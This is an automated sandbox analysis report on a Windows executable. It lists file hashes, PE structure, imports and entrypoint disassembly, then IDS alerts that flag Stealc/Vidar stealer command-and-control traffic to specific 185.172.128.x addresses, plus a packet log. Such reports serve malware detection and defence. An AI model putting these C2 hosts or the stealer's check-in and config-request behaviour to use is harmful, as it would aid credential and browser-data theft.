SSDEEP:	6144:dIXfpi67eLPU9skLmb0b4/WSPKaJG8nAgejZMMhA2gX4WABl0uNbdwBCswSbn:OXD94/WlLZMM6YFHJ+n
MD5:	8C8B6903119C2DF7CA30484BE7167963
SHA1:	03AC8462E54C55A38B90EDDAD4B936BE1FA1A8FF
SHA-256:	BE243F48E05E2378547B739BA9BB2641EF3B512B8F93CA412263A129057F34E5
SHA-512:	5FA812A24E9003F109E0E9449DAB5B71313539B8AB616D921FC5B5D44C886B5DE7CBC5E434D5C5C742385A030AC009967D854349EF39AD711B4044B0F40385D9
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...................................................................................................................................................................................................................................................................................................................................................UX..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.154015481788982
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wxfSIz4PAi.exe
File size:	460'289 bytes
MD5:	0a7871874dc7111b978e798f616211f9
SHA1:	5f020eefc6d5da7efecd31bd3911911169d99021
SHA256:	209765690105250f9d48d09d6bf6c4bbe22668e38b7b7e400b703e27bec45057
SHA512:	19b5f8b0f64a0175494d7725875d57cf66a4c90a9fba74e0333f129e1386c6c2458ffc35f4774fad01e8fa2b2ccd59baf56dcc65a27e4f90d42005fe25fbda52
SSDEEP:	12288:UguknPtI9oifhEvyzH3Ig4t5Ri3zg8kQAX6YK1:znFRiySH3Ilt5Ri3rkT6Ye
TLSH:	A0A49D4372D1BC60E4260B325F1E9ADC772DF9618E65EB2B2248DE0F05B13B1D623729
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...p.xd...........

File Icon


Icon Hash:	453145454155610d

Static PE Info

General

Entrypoint:	0x4040e7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6478C170 [Thu Jun 1 16:04:00 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	edb3c0a48d18802f263453ac21caaefd

Entrypoint Preview

Instruction
call 00007FF8C4D417BDh
jmp 00007FF8C4D3B445h
push 00000014h
push 00419050h
call 00007FF8C4D3D5A8h
call 00007FF8C4D40123h
movzx esi, ax
push 00000002h
call 00007FF8C4D41750h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007FF8C4D3B446h
xor ebx, ebx
jmp 00007FF8C4D3B475h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007FF8C4D3B42Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007FF8C4D3B41Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007FF8C4D3B44Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007FF8C4D3C7DCh
test eax, eax
jne 00007FF8C4D3B44Ah
push 0000001Ch
call 00007FF8C4D3B521h
pop ecx
call 00007FF8C4D4134Eh
test eax, eax
jne 00007FF8C4D3B44Ah
push 00000010h
call 00007FF8C4D3B510h
pop ecx
call 00007FF8C4D3FFEBh
and dword ptr [ebp-04h], 00000000h
call 00007FF8C4D3EAE2h
test eax, eax
jns 00007FF8C4D3B44Ah
push 0000001Bh
call 00007FF8C4D3B4F6h
pop ecx
call dword ptr [004130C4h]
mov dword ptr [04047030h], eax
call 00007FF8C4D417A4h
mov dword ptr [004595C0h], eax
call 00007FF8C4D413A1h
test eax, eax
jns 00007FF8C4D3B44Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x194a4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c48000	0x16c8d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c5f000	0x144c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18988	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x118a3	0x11a00	304dff5a0f4ac2df96f80a2894631a17	False	0.6099706338652482	data	6.693033275368329	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x6d94	0x6e00	ab0db6cf5e54ad996c80e914e5e99b67	False	0.3920099431818182	data	4.748929159078427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c2d048	0x3f600	685b97e8aaad9b614ae9bf02af29567b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c48000	0x16c8d	0x16e00	f671658fd2493c05b611c2bc122eeb61	False	0.42566384904371585	data	4.939222900407214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c5f000	0x144c	0x1600	9be4907c5d0910d16fe68da865190741	False	0.7253196022727273	data	6.35911031688205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3c486b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4130184331797235
RT_ICON	0x3c48d80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.16410788381742739
RT_ICON	0x3c4b328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.21365248226950354
RT_ICON	0x3c4b790	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3694029850746269
RT_ICON	0x3c4c638	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4535198555956679
RT_ICON	0x3c4cee0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4602534562211982
RT_ICON	0x3c4d5a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.45736994219653176
RT_ICON	0x3c4db10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2671161825726141
RT_ICON	0x3c500b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.30863039399624764
RT_ICON	0x3c51160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3554964539007092
RT_ICON	0x3c515c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5674307036247335
RT_ICON	0x3c52470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5478339350180506
RT_ICON	0x3c52d18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.6192196531791907
RT_ICON	0x3c53280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4619294605809129
RT_ICON	0x3c55828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48874296435272047
RT_ICON	0x3c568d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.4979508196721312
RT_ICON	0x3c57258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.450354609929078
RT_ICON	0x3c576c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4229744136460554
RT_ICON	0x3c58568	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.48194945848375453
RT_ICON	0x3c58e10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5858294930875576
RT_ICON	0x3c594d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4985549132947977
RT_ICON	0x3c59a40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.47116182572614107
RT_ICON	0x3c5bfe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48592870544090055
RT_ICON	0x3c5d090	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.5008196721311475
RT_ICON	0x3c5da18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5478723404255319
RT_STRING	0x3c5de80	0x428	data	0.45206766917293234
RT_STRING	0x3c5e2a8	0x3c8	data	0.4628099173553719
RT_GROUP_ICON	0x3c5e670	0x68	data	0.7115384615384616
RT_GROUP_ICON	0x3c5e6d8	0x68	data	0.6826923076923077
RT_GROUP_ICON	0x3c5e740	0x30	data	0.9375
RT_GROUP_ICON	0x3c5e770	0x76	data	0.6779661016949152
RT_VERSION	0x3c5e7e8	0x244	data	0.5396551724137931
RT_MANIFEST	0x3c5ea2c	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators	0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, GetExitCodeThread, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, GetOEMCP, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, HeapAlloc, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-23:08:52.240583	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/26/24-23:09:00.358800	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49733	185.172.128.76	192.168.2.4
04/26/24-23:08:57.572292	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49733	80	192.168.2.4	185.172.128.76
04/26/24-23:08:59.654524	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49733	80	192.168.2.4	185.172.128.76
04/26/24-23:09:00.002826	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49733	185.172.128.76	192.168.2.4
04/26/24-23:09:00.005433	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49733	80	192.168.2.4	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 23:08:48.121798992 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 23:08:48.793616056 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 26, 2024 23:08:52.000494957 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 23:08:52.240346909 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 23:08:52.240487099 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 23:08:52.240582943 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 23:08:52.480269909 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 23:08:53.904736996 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 26, 2024 23:08:53.949850082 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 23:08:54.130351067 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 26, 2024 23:08:54.612963915 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 23:08:54.853843927 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 23:08:54.854088068 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 23:08:54.854088068 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 23:08:55.094258070 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 23:08:55.095015049 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 26, 2024 23:08:55.096709013 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 26, 2024 23:08:55.109692097 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.349553108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.349673986 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.363866091 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.603794098 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604291916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604312897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604330063 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604347944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604408026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604412079 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.604465961 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.604506016 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604549885 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.604651928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604732990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604773045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604782104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.604845047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.604895115 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.845791101 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845819950 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845838070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845873117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845890045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845909119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845927000 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.845943928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846025944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846033096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846033096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846033096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846045971 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846101046 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846182108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846199989 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846220016 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846255064 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846435070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846452951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846470118 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846498966 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846512079 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846573114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846591949 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846653938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:55.846760035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846776962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:55.846826077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087003946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087086916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087109089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087163925 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087241888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087260008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087284088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087301970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087310076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087327957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087389946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087408066 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087430000 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087443113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087495089 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087577105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087594032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087611914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087629080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087646961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087646961 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087666035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087667942 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087685108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087703943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087721109 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087721109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087743044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087752104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087759972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087778091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087795973 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087798119 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087814093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087821960 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087832928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087852001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087865114 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087868929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087886095 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087897062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087903976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087920904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087934971 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087939024 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087959051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087965012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.087977886 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.087996006 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088004112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.088015079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088032961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088040113 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.088052034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088069916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088077068 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.088087082 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088114977 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.088221073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.088274002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.327363014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327388048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327404976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327478886 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.327580929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327657938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.327663898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327828884 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327893972 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.327898026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.327987909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328037024 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328052044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328159094 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328211069 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328216076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328259945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328308105 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328329086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328361988 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328413963 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328440905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328532934 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328587055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328591108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328624964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328674078 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328704119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328771114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328814983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328823090 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328893900 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328912973 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.328943968 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.328989983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329051018 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329063892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329139948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329189062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329235077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329282999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329329014 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329356909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329420090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329471111 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329499006 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329583883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329638004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329638958 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329724073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329777956 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329787970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329869032 CEST	80	49732	185.172.128.59	192.168.2.4
